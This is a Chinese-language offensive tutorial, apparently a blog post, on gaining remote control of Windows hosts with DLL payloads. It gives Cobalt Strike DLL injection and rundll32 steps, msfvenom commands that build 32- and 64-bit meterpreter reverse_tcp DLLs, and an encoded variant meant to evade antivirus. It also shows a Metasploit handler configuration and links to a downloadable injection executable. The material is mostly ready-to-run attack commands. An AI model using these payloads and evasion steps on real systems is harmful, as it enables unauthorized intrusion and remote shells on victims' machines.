概述

闲来无事，发现cs生成dll的功能挺不错的，msf也同样有这些功能，于是，尝试用这个方法进行上线，查了一些资料，感觉这个功能用的好的话，还是挺强大的

测试了一下，是能够过一些基本的杀毒软件，火绒之类的过不了，不过即使鸡肋，总有能用到的地方

一般要用到这个，也是拿到shell后的事情了，测试过程如下

使用工具注入

1.cs生成dll进行注入

首先，先部署好cs服务器，开启一个监听：

然后生成dll文件（这个没法直接运行，需要配合工具使用，工具网上有许多，文章末尾我会分享一个工具的）

生成后，尝试使用工具进行dll注入，但是失败了，如图

injectDll.exe 2264 reverse.dll

只有部分的进程能够注入，那么这里该怎么办呢？

那就换个工具，使用rundll来尝试，如图：

rundll32.exe beacon.dll,bb

成功上线

2.msf生成dll进行注入

先生成一个dll文件，供你的目标下载：

生成32位：

sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=ip LPORT=端口 > reverse_32bit.dll

生成64位：

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=ip LPORT=端口 > reverse_32bit.dll

生成免杀：

sudo msfvenom -p windows/meterpreter/reverse_tcp -i 7 -b '\x00' -ax86 -f dll LHOST=ip LPORT=端口 > reverse_32bit.dll

生成后，只需要照着上面的方式，加载dll就可以上线了，如图：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

工具地址：

https://2603957456-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LKwewtTZu_ler4vNxYf%2F-LKwf4McUH9P9t8eWXiL%2Finject1.exe?alt=media&token=60fcca8b-3336-4c4f-a8ba-de5f5dcbe84c

https://github.com/jhhua/Cs_X_Msf_inject/releases/tag/inject